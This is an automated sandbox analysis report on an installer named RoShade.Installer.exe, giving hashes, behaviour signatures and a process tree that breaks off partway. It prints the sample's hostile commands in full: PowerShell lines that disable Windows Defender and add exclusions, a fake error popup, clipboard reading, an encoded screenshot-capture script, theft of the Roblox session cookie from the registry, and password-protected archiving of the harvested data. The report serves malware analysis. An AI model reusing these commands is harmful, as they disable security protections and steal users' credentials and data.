Resubmissions

17-11-2024 15:23

241117-sskg3sxlbr 10

Analysis

  • max time kernel
    21s
  • max time network
    23s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-11-2024 15:23

General

  • Target

    RoShade.Installer.exe

  • Size

    5.8MB

  • MD5

    a009d18ad6b1ad27d3bfe34af2523c89

  • SHA1

    efe133b7259a700a1c838af989468ab65df1ca7b

  • SHA256

    be59ff484a7fa035caee41f9c6c70572250960f09768818b7cf9256013e2a007

  • SHA512

    9b33219a9b98eaa55a347cdd3a231e36c63d83653e2cda39cea36c3e4ffa1e4b45e317f4b15ceeb3c5a8933a996ace45fe3dc0524e1ab383a59df65126de5c38

  • SSDEEP

    98304:LimDSuXXOa7RHtJQi9UWvGfqD8WOxfmjaa15uXaDvdCK/blzFS03iw7FwXR6n3eX:LimDZtRHvUWvozWOxu9kXwvdbDlA03N4

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • UPX packed file 62 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RoShade.Installer.exe
    "C:\Users\Admin\AppData\Local\Temp\RoShade.Installer.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4220
    • C:\Users\Admin\AppData\Local\Temp\RoShade.Installer.exe
      "C:\Users\Admin\AppData\Local\Temp\RoShade.Installer.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4964
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RoShade.Installer.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3012
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RoShade.Installer.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4056
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3820
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4992
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The following component(s) are required to run this program: DirectX Runtime .NET Framework 3.5 (includes .NET 2.0 and 3.0)', 0, 'Error', 0+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3396
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The following component(s) are required to run this program: DirectX Runtime .NET Framework 3.5 (includes .NET 2.0 and 3.0)', 0, 'Error', 0+16);close()"
          4⤵
            PID:3340
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3624
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:3456
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4440
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:668
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3760
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            4⤵
              PID:4564
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4724
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              4⤵
                PID:5020
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:884
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:824
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:744
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                PID:2712
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌​ ‎‍.scr'"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:5012
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌​ ‎‍.scr'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:4740
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3740
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:3968
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:560
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:1524
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              3⤵
                PID:2396
                • C:\Windows\System32\Wbem\WMIC.exe
                  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                  4⤵
                    PID:2572
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                  3⤵
                  • Clipboard Data
                  • Suspicious use of WriteProcessMemory
                  PID:1848
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell Get-Clipboard
                    4⤵
                    • Clipboard Data
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4136
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                  3⤵
                    PID:4488
                    • C:\Windows\system32\tasklist.exe
                      tasklist /FO LIST
                      4⤵
                      • Enumerates processes with tasklist
                      PID:3772
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:5032
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:2324
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "systeminfo"
                        3⤵
                          PID:1004
                          • C:\Windows\system32\systeminfo.exe
                            systeminfo
                            4⤵
                            • Gathers system information
                            PID:2676
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                          3⤵
                            PID:3276
                            • C:\Windows\system32\reg.exe
                              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                              4⤵
                                PID:1264
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                              3⤵
                                PID:2940
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:1864
                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qsf2mb20\qsf2mb20.cmdline"
                                    5⤵
                                      PID:5048
                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDC37.tmp" "c:\Users\Admin\AppData\Local\Temp\qsf2mb20\CSCB8A44B785620486EA9E2C8D5268777FD.TMP"
                                        6⤵
                                          PID:5032
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    3⤵
                                      PID:4808
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        4⤵
                                          PID:2488
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                        3⤵
                                          PID:3348
                                          • C:\Windows\system32\attrib.exe
                                            attrib -r C:\Windows\System32\drivers\etc\hosts
                                            4⤵
                                            • Drops file in Drivers directory
                                            • Views/modifies file attributes
                                            PID:1960
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          3⤵
                                            PID:2728
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              4⤵
                                                PID:2340
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                              3⤵
                                                PID:2080
                                                • C:\Windows\system32\attrib.exe
                                                  attrib +r C:\Windows\System32\drivers\etc\hosts
                                                  4⤵
                                                  • Drops file in Drivers directory
                                                  • Views/modifies file attributes
                                                  PID:4800
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                3⤵
                                                  PID:2332
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    4⤵
                                                      PID:2600
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                    3⤵
                                                      PID:1468
                                                      • C:\Windows\system32\tasklist.exe
                                                        tasklist /FO LIST
                                                        4⤵
                                                        • Enumerates processes with tasklist
                                                        PID:2200
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      3⤵
                                                        PID:756
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          4⤵
                                                            PID:2324
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          3⤵
                                                            PID:1620
                                                            • C:\Windows\system32\tree.com
                                                              tree /A /F
                                                              4⤵
                                                                PID:3336
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                              3⤵
                                                                PID:5012
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                  4⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:2712
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                3⤵
                                                                  PID:4780
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                    4⤵
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    PID:1848
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "getmac"
                                                                  3⤵
                                                                    PID:4528
                                                                    • C:\Windows\system32\getmac.exe
                                                                      getmac
                                                                      4⤵
                                                                        PID:3056
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI42202\rar.exe a -r -hp"ria" "C:\Users\Admin\AppData\Local\Temp\I6xjX.zip" *"
                                                                      3⤵
                                                                        PID:5032
                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI42202\rar.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\_MEI42202\rar.exe a -r -hp"ria" "C:\Users\Admin\AppData\Local\Temp\I6xjX.zip" *
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          PID:3336
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                        3⤵
                                                                          PID:2672
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic os get Caption
                                                                            4⤵
                                                                              PID:4144
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                            3⤵
                                                                              PID:2200
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic computersystem get totalphysicalmemory
                                                                                4⤵
                                                                                  PID:3012
                                                                              • C:\Windows\system32\cmd.exe
